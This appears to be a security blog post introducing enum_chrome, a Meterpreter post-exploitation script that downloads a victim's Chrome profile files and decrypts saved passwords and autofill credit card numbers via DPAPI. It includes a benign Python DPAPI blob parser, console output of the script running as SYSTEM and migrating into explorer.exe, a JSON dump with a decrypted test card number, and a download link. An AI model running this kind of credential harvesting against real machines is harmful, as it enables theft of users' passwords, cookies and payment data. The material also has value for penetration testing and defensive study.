Meterpreter Script to extract chrome browser data


About two months ago, Jeremiah Grossman found a nice way to exploit the form autofill feature of the Safari browser to extract the stored data.
A few days later Google announced that Chrome 6 will support form autofill including credit card information.

I was curious how the data is stored and the Metasploit project was missing a Meterpreter script to extract Chrome browser data anyway, so I created one.

The information is stored in SQLite databases and some JSON files in the user's Chrome profile. The script downloads these files and extracts the useful information from the databases, storing the result as JSON dumps so it is both human-readable and easy to parse.

The most sensitive data (saved passwords and autofill credit card numbers) is encrypted with the Windows DPAPI function CryptProtectData:

“Typically, only a user with the same logon credential as the user who encrypted the data can decrypt the data. In addition, the encryption and decryption usually must be done on the same computer.”
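As an added example (not part of this post or of enum_chrome.rb), the following Python script shows the two things the post describes: dumping a Chrome-style SQLite table to JSON, and what a CryptProtectData blob looks like when you inspect it offline. It builds its own in-memory table and a DPAPI-shaped blob instead of reading a real profile; the column names follow the credit_cards dump shown later in the post, and the blob layout is the documented CryptProtectData output format (version, provider GUID, master key GUID, algorithm ids, salt, ciphertext, signature). The function names, the sample row and the master key GUID 11111111-2222-3333-4444-555555555555 are constructed for the example.

```python
"""Added example (not the post's script): dump a Chrome-style SQLite table to
JSON and read the DPAPI blob header offline. Schema, row and blob bytes are
constructed; the blob layout is CryptProtectData's documented output format."""
import base64
import json
import sqlite3
import struct
import uuid

# Every CryptProtectData blob starts with version 1 and this provider GUID.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
CALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256", 0x8004: "CALG_SHA1"}
# Constructed master key GUID; a real one names a file in the user's DPAPI store.
SAMPLE_MASTER_KEY_GUID = uuid.UUID("11111111-2222-3333-4444-555555555555")


def _lv(data: bytes) -> bytes:
    """DWORD length prefix + bytes, the convention used inside DPAPI blobs."""
    return struct.pack("<I", len(data)) + data


def build_sample_blob(master_key_guid: uuid.UUID, ciphertext: bytes) -> bytes:
    """Constructed DPAPI-shaped blob: salt, HMAC key and signature are filler."""
    return (struct.pack("<I", 1)                  # dwVersion
            + DPAPI_PROVIDER_GUID.bytes_le        # guidProvider
            + struct.pack("<I", 1)                # dwMasterKeyVersion
            + master_key_guid.bytes_le            # guidMasterKey
            + struct.pack("<I", 0)                # dwFlags
            + _lv(b"\x00\x00")                    # description: empty UTF-16 string
            + struct.pack("<II", 0x6603, 168)     # algCrypt = CALG_3DES, key bits
            + _lv(b"\x11" * 16)                   # salt
            + _lv(b"")                            # "strong" field, normally empty
            + struct.pack("<II", 0x8004, 160)     # algHash = CALG_SHA1, hash bits
            + _lv(b"\x22" * 16)                   # HMAC key
            + _lv(ciphertext)                     # encrypted data
            + _lv(b"\x33" * 20))                  # signature


def parse_dpapi_blob(blob: bytes) -> dict:
    """Parse the DPAPI blob header; raises ValueError for anything else."""
    off = 0

    def take(n: int) -> bytes:
        nonlocal off
        if off + n > len(blob):
            raise ValueError("truncated DPAPI blob")
        off += n
        return blob[off - n:off]

    dword = lambda: struct.unpack("<I", take(4))[0]
    lv = lambda: take(dword())
    version, provider = dword(), uuid.UUID(bytes_le=take(16))
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob")
    info = {"version": version, "provider_guid": str(provider),
            "master_key_version": dword(),
            "master_key_guid": str(uuid.UUID(bytes_le=take(16))),
            "flags": dword(),
            "description": lv().decode("utf-16-le").rstrip("\x00")}
    alg_crypt = dword()
    info["alg_crypt"] = CALG_NAMES.get(alg_crypt, hex(alg_crypt))
    info["key_bits"] = dword()
    info["salt_len"] = len(lv())
    lv()  # "strong" field
    alg_hash = dword()
    info["alg_hash"] = CALG_NAMES.get(alg_hash, hex(alg_hash))
    info["hash_bits"] = dword()
    info["hmac_key_len"] = len(lv())
    info["ciphertext_len"] = len(lv())
    info["signature_len"] = len(lv())
    if off != len(blob):
        raise ValueError("trailing bytes after DPAPI signature")
    return info


def is_dpapi_blob(blob: bytes) -> bool:
    """True if the bytes parse as a complete DPAPI blob."""
    try:
        parse_dpapi_blob(blob)
        return True
    except ValueError:
        return False


def dump_table(conn: sqlite3.Connection, table: str) -> list:
    """Rows as JSON-ready dicts; DPAPI BLOBs get a <column>_dpapi header entry."""
    cur = conn.execute(f'SELECT * FROM "{table}"')  # table name is ours, not user input
    cols = [d[0] for d in cur.description]
    rows = []
    for values in cur.fetchall():
        row = {}
        for name, val in zip(cols, values):
            if not isinstance(val, bytes):
                row[name] = val
                continue
            row[name] = base64.b64encode(val).decode("ascii")
            if is_dpapi_blob(val):
                row[name + "_dpapi"] = parse_dpapi_blob(val)
        rows.append(row)
    return rows


def make_sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the credit_cards table in 'Web Data'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""CREATE TABLE credit_cards (unique_id INTEGER PRIMARY KEY,
        label VARCHAR, name_on_card VARCHAR, type VARCHAR, card_number VARCHAR,
        expiration_month INTEGER, expiration_year INTEGER, verification_code VARCHAR,
        billing_address VARCHAR, shipping_address VARCHAR,
        card_number_encrypted BLOB, verification_code_encrypted BLOB)""")
    # A 16-digit number padded to a 3DES block multiple gives 24 ciphertext bytes.
    blob = build_sample_blob(SAMPLE_MASTER_KEY_GUID, b"\x44" * 24)
    conn.execute("INSERT INTO credit_cards VALUES (1, '', 'Test Card', '', '', "
                 "12, 2010, '', '', '', ?, X'')", (blob,))
    conn.commit()
    return conn


if __name__ == "__main__":
    print(json.dumps(dump_table(make_sample_db(), "credit_cards"), indent=2))
```

The header alone tells you that the field is 3DES/SHA-1 DPAPI data bound to one specific master key GUID and carries no key material of its own. With only the downloaded database there is nothing to decrypt it with, which is why the script has to call CryptUnprotectData on the target in the context of the user who owns the profile.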

To decrypt the data, the script calls the CryptUnprotectData function on the target system using the new railgun Meterpreter extension.
For this to work, the Meterpreter process on the target must run as the user the data belongs to, so a session running as SYSTEM cannot decrypt it directly.
To reach the data of the currently logged-on user, the script can (with the -m option) automatically migrate into that user's explorer.exe process and, after the decryption is done, migrate back into the original process. Only the interactively logged-on user is reachable this way; another user's profile stays encrypted unless a process in that user's context is available.

The following shows the console output of the script:

```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run enum_chrome -m
[*] current PID is 1100. migrating into explorer.exe, PID=2916...
[*] done.
[*] running as user 'VM-WINXP\test'...
[*] extracting data for user 'test'...
[*] downloading file Web Data to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Web Data'...
[*] downloading file Cookies to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Cookies'...
[*] downloading file History to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/History'...
[*] downloading file Login Data to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Login Data'...
[*] downloading file Bookmarks to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Bookmarks'...
[*] downloading file Preferences to '/home/sven/.msf3/logs/scripts/enum_chrome/10.1.1.11/20100920.2016/test/Preferences'...
[*] creating file 'autofill.json'...
[*] creating file 'autofill_profiles.json'...
[*] creating file 'autofill_credit_cards.json'...
[*] decrypting field 'card_number_encrypted'...
[*] creating file 'cookies.json'...
[*] creating file 'history.json'...
[*] creating file 'logins.json'...
[*] creating file 'bookmarks.json'...
[*] creating file 'preferences.json'...
[*] migrating back into PID=1100...
[*] done.
meterpreter >
```

The file 'autofill_credit_cards.json' then contains the following (the field "card_number_encrypted_decrypted" is added by the script; the "card_number_encrypted" value is the raw DPAPI blob as dumped, with non-printable bytes rendered by the terminal):

```json
[
  {
    "label": "",
    "verification_code_encrypted": "",
    "unique_id": 1,
    "expiration_year": 2010,
    "card_number": "",
    "shipping_address": "",
    "type": "",
    "card_number_encrypted": "\u0001\u0000\u0000\u0000Ð~L~]ß\u0001\u0015Ñ\u0011~Lz\u0000ÀOÂ~Wë\u0001\u0000\u0000\u0000/\u0006E\u000eú«}N~LÁ\u001bjÍ5\u0004~\\u0000\u0000\u0000\u0000\u0002\u0000\u0000\u0000\u0000\u0000\u0003f\u0000\u0000¨\u0000\u0000\u0000\u0010\u0000\u0000\u0000Ú½[~LökºíaÂAÕ\u0013ÖoÚ\u0000\u0000\u0000\u0000\u0004~@\u0000\u0000| \u0000\u0000\u0000\u0010\u0000\u0000\u0000~Eî\\uFÎrgé|i¬.\u0002~P~I\u0018\u0000\u0000\u0000~N£Hvß~FÃÀê%á6h¢Q~Q;j NØ\u0002m±\u0014\u0000\u0000\u0000Yö|#~\~A°µ±ù~Zå·®\u0007éJ~KyÓ",
    "billing_address": "",
    "expiration_month": 12,
    "verification_code": "",
    "name_on_card": "Test Card",
    "card_number_encrypted_decrypted": "0123456789012345"
  }
]
```

You can download the script here: http://github.com/svent/misc/blob/master/metasploit/enum_chrome.rb